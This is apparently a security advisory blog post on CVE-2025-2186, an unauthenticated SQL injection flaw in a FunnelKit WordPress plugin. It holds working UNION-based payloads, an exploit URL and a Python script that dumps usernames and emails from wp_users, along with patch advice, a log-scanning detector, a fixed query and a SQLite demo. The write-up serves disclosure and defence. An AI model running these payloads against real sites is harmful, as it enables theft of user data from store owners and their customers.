A high-risk vulnerability, CVE-2025-2186, was identified in the popular FunnelKit plugin for WordPress, specifically in the Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation module. This flaw affects all versions up to and including 3.5.1. By exploiting a lack of proper validation in the automationId parameter, unauthenticated attackers can execute malicious SQL queries on vulnerable sites. Here, we’ll break down how the bug works, show a demonstration, and discuss how to stay protected.

What’s the Problem?

The vulnerable plugin is widely used to automate email marketing for WooCommerce stores. Unfortunately, it mishandles user input in the automationId parameter, directly inserting it into SQL queries without adequate escaping or parameterization. This means attackers can inject raw SQL—opening the door to extracting sensitive info like usernames, email addresses, and hashed passwords from the site database.

How Does the Exploit Work?

When a feature in the plugin receives a request (usually via AJAX or REST), it expects an automationId parameter. In vulnerable versions, the plugin puts this parameter straight into an SQL statement. The snippet below is a simplified illustration of that pattern (table and variable names are illustrative, not the plugin's actual code):

// Vulnerable pattern: the raw request value is spliced into the SQL text
$automationId = $_GET['automationId'];
$query = "SELECT * FROM {$wpdb->prefix}funnelkit_automations WHERE id = $automationId";
$results = $wpdb->get_results($query); // whatever the attacker appended now runs as SQL

If an attacker sends

automationId=1 OR 1=1

The query becomes

SELECT * FROM wp_funnelkit_automations WHERE id = 1 OR 1=1;

Because 1=1 is always true, the WHERE clause matches every row, so the query returns the entire automations table instead of the single record that was requested, leaking every automation's details.

But it gets worse: with a UNION-based injection the attacker can append a SELECT against any other table and have its rows returned in the same response, which is how arbitrary database contents (including wp_users) are extracted.

Example Exploit

Let’s say the attacker wants to steal admin usernames and email addresses. They could craft a URL like:

https://vuln-site.com/wp-admin/admin-ajax.php?action=fk_get_automation&automationId=1 UNION SELECT 1,user_login,user_email,4 FROM wp_users--

Note: The exact payload depends on the database schema and plugin version. The UNION must supply the same number of columns as the original SELECT (four in this illustration), and the fk_get_automation action name is illustrative. Also, MySQL only treats -- as a comment when it is followed by whitespace, so in practice attackers send -- - (URL-encoded --+-) whenever there is trailing SQL to comment out.

Because the injected text is concatenated into the query, the UNION appends rows from wp_users to the result set, and the AJAX handler returns them to the caller, all without needing to log in.

Here’s a simple Python snippet that sends the same request to a site running the vulnerable plugin:

import requests

# Illustrative target, action name and column layout; adjust to the real schema
target_url = 'https://targetsite.com/wp-admin/admin-ajax.php'
payload = '1 UNION SELECT 1,user_login,user_email,4 FROM wp_users-- -'
params = {
    'action': 'fk_get_automation',
    'automationId': payload
}

# requests URL-encodes the payload; no cookies or nonce are needed because the
# handler is reachable unauthenticated
resp = requests.get(target_url, params=params, timeout=10)
print(resp.status_code)
print(resp.text)

If the site is vulnerable, the AJAX response will contain usernames and email addresses pulled from the site’s user table alongside (or in place of) the automation data.

References and Advisories

- Wordfence: CVE-2025-2186 Security Advisory
- FunnelKit Plugin Page
- WPScan Vulnerability Database

How to Stay Safe

1. Patch Immediately: Update FunnelKit to a version later than 3.5.1, where the parameter is validated and passed through prepared statements.

2. Restrict access: admin-ajax.php is used by the front end of many plugins, so blocking it outright will break sites. Instead, limit the specific actions you do not need, and block unauthenticated access to endpoints that have no reason to be public.

3. Web Application Firewall: Use security plugins like Wordfence or Sucuri, which can virtually patch the vulnerable request pattern until you have updated.
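To hunt for exploitation attempts in web server logs, here is an added Python example (not code from this page, from Wordfence or from FunnelKit) that parses combined-format access-log lines, decodes the query string, and flags any automationId value that is not a plain integer, escalating to an SQL-injection finding when keywords or comment markers appear. The log lines are constructed for this demo, and the fk_get_automation action name is carried over from the illustrative URL above. It decodes twice so that double-encoded payloads are caught, and it only sees GET parameters, since POST bodies are not written to standard access logs.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed access-log lines (combined log format) for this demo; the
# fk_get_automation action name is illustrative, as in the URL above.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Mar/2025:14:02:11 +0000] "GET /wp-admin/admin-ajax.php?action=fk_get_automation&automationId=12 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [22/Mar/2025:14:02:15 +0000] "GET /wp-admin/admin-ajax.php?action=fk_get_automation&automationId=1%20OR%201%3D1 HTTP/1.1" 200 8192 "-" "python-requests/2.31"
203.0.113.9 - - [22/Mar/2025:14:02:19 +0000] "GET /wp-admin/admin-ajax.php?action=fk_get_automation&automationId=1+UNION+SELECT+1%2Cuser_login%2Cuser_email%2C4+FROM+wp_users--+- HTTP/1.1" 200 9120 "-" "python-requests/2.31"
203.0.113.9 - - [22/Mar/2025:14:02:25 +0000] "GET /wp-admin/admin-ajax.php?action=fk_get_automation&automationId=1%2520OR%25201%253D1 HTTP/1.1" 200 8192 "-" "python-requests/2.31"
198.51.100.4 - - [22/Mar/2025:14:03:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Indicators worth flagging when the parameter is supposed to be a bare integer.
SQLI_RE = re.compile(
    r"(\bunion\b|\bselect\b|\bor\b|\band\b|\bsleep\b|\bbenchmark\b|--|/\*|#|')",
    re.IGNORECASE,
)


def classify_automation_id(value):
    """Return None for a plain integer, otherwise a short reason string."""
    decoded = unquote_plus(value)  # second decode catches double-encoded payloads
    if re.fullmatch(r"-?\d+", decoded.strip()):
        return None
    m = SQLI_RE.search(decoded)
    return "sqli:" + m.group(1).lower() if m else "non-numeric"


def scan_access_log(text):
    """Return one finding per request whose automationId is not a plain integer."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Only GET parameters are visible in the request line; POST bodies are
        # not logged, so those need WAF or application-level request logging.
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for raw in params.get("automationId", []):
            reason = classify_automation_id(raw)
            if reason is None:
                continue
            findings.append({
                "ip": m["ip"],
                "time": m["ts"],
                "reason": reason,
                "value": unquote_plus(raw),
                "status": int(m["status"]),
                # A large 200 response to an injected request hints the dump worked
                "bytes": 0 if m["size"] == "-" else int(m["size"]),
            })
    return findings


def attackers_by_hits(findings):
    """Aggregate findings per source IP to prioritise blocking and review."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['time']} {f['ip']} {f['reason']:<12} {f['bytes']:>6}B  {f['value']}")
    print(attackers_by_hits(hits))
```

Run it against a real log with scan_access_log(open(path).read()); any finding with a 200 status and an unusually large byte count deserves the same treatment as a confirmed compromise (rotate credentials, audit wp_users) rather than just a block rule.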

The plugin should validate the type of automationId and pass it through $wpdb->prepare() rather than string interpolation. For example:

$automationId = intval($_GET['automationId']);
$query = $wpdb->prepare("SELECT * FROM {$wpdb->prefix}funnelkit_automations WHERE id = %d", $automationId);
$results = $wpdb->get_results($query);

This makes sure that the user-supplied automationId is treated as an integer, not as part of the SQL. Either half is enough on its own ($wpdb->prepare() casts a %d placeholder to an integer, and intval() does the same before the value reaches the query), so using both is belt-and-braces. Note that $wpdb->prepare() is a formatting and escaping function, not a server-side prepared statement, which is why choosing the right placeholder type (%d, not %s) matters.
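To see both payloads from How Does the Exploit Work land and the intval() plus $wpdb->prepare('%d') fix neutralise them without touching a live site, here is an added Python example (not code from this page or from FunnelKit) that replays the lookup against an in-memory SQLite database. The table layout (a four-column automations table and the wp_users columns used above) and the rows are constructed assumptions for the demo. The hardened version mirrors the PHP fix with one deliberate difference: PHP's intval('1 OR 1=1') silently returns 1, whereas this version rejects any non-integer input outright, which is the stricter choice.

```python
import sqlite3

# Constructed rows standing in for the plugin's automations table and the
# WordPress users table; the column layout is an assumption for this demo.
AUTOMATIONS = [
    (1, "abandoned-cart", "active", "2025-01-01"),
    (2, "welcome-series", "paused", "2025-01-02"),
    (3, "win-back", "active", "2025-01-03"),
]
USERS = [
    (1, "admin", "admin@example.com", "$P$BfakehashA"),
    (2, "editor", "editor@example.com", "$P$BfakehashB"),
]


def build_db():
    """In-memory stand-in for the WordPress database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_funnelkit_automations "
               "(id INTEGER, name TEXT, status TEXT, created TEXT)")
    db.execute("CREATE TABLE wp_users "
               "(ID INTEGER, user_login TEXT, user_email TEXT, user_pass TEXT)")
    db.executemany("INSERT INTO wp_funnelkit_automations VALUES (?, ?, ?, ?)", AUTOMATIONS)
    db.executemany("INSERT INTO wp_users VALUES (?, ?, ?, ?)", USERS)
    return db


def vulnerable_lookup(db, automation_id):
    """The flawed pattern: the raw parameter is spliced into the SQL text."""
    query = f"SELECT * FROM wp_funnelkit_automations WHERE id = {automation_id}"
    return db.execute(query).fetchall()


def hardened_lookup(db, automation_id):
    """Equivalent of intval() + $wpdb->prepare('%d'): type-check, then bind."""
    try:
        clean_id = int(str(automation_id).strip())
    except ValueError:
        return None  # reject; a WP handler would wp_send_json_error() here
    query = "SELECT * FROM wp_funnelkit_automations WHERE id = ?"
    return db.execute(query, (clean_id,)).fetchall()


# The three inputs discussed on this page.
BENIGN = "1"
OR_PAYLOAD = "1 OR 1=1"
UNION_PAYLOAD = "1 UNION SELECT 1,user_login,user_email,4 FROM wp_users--"


def demo():
    """Return row counts and any leaked user data for both code paths."""
    db = build_db()
    union_rows = vulnerable_lookup(db, UNION_PAYLOAD)
    # User rows come back in the automations' column positions; pick them out
    # by the e-mail address that landed in the 'status' column.
    leaked = [(r[1], r[2]) for r in union_rows if r[2] and "@" in r[2]]
    return {
        "vuln_benign": len(vulnerable_lookup(db, BENIGN)),
        "vuln_or": len(vulnerable_lookup(db, OR_PAYLOAD)),
        "vuln_union": len(union_rows),
        "leaked_users": leaked,
        "safe_benign": len(hardened_lookup(db, BENIGN)),
        "safe_or": hardened_lookup(db, OR_PAYLOAD),
        "safe_union": hardened_lookup(db, UNION_PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:<14} {value}")
```

The vulnerable path returns one row for a benign id, every automation for the OR payload, and the automations plus both user accounts for the UNION payload; the hardened path returns the single row for a benign id and rejects both payloads before any SQL runs. SQLite's trailing -- comment behaves slightly differently from MySQL's (see the note under Example Exploit), which is why the MySQL form usually needs a trailing space.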

Final Thoughts

CVE-2025-2186 is a classic reminder that user input should never be trusted in web development. If you’re a WooCommerce store owner using this plugin, update now, audit your user list for suspicious accounts, and keep security top-of-mind. Exploitation requires no authentication and is trivial to automate, so don’t take chances.

Timeline

Published on: 03/22/2025 13:15:35 UTC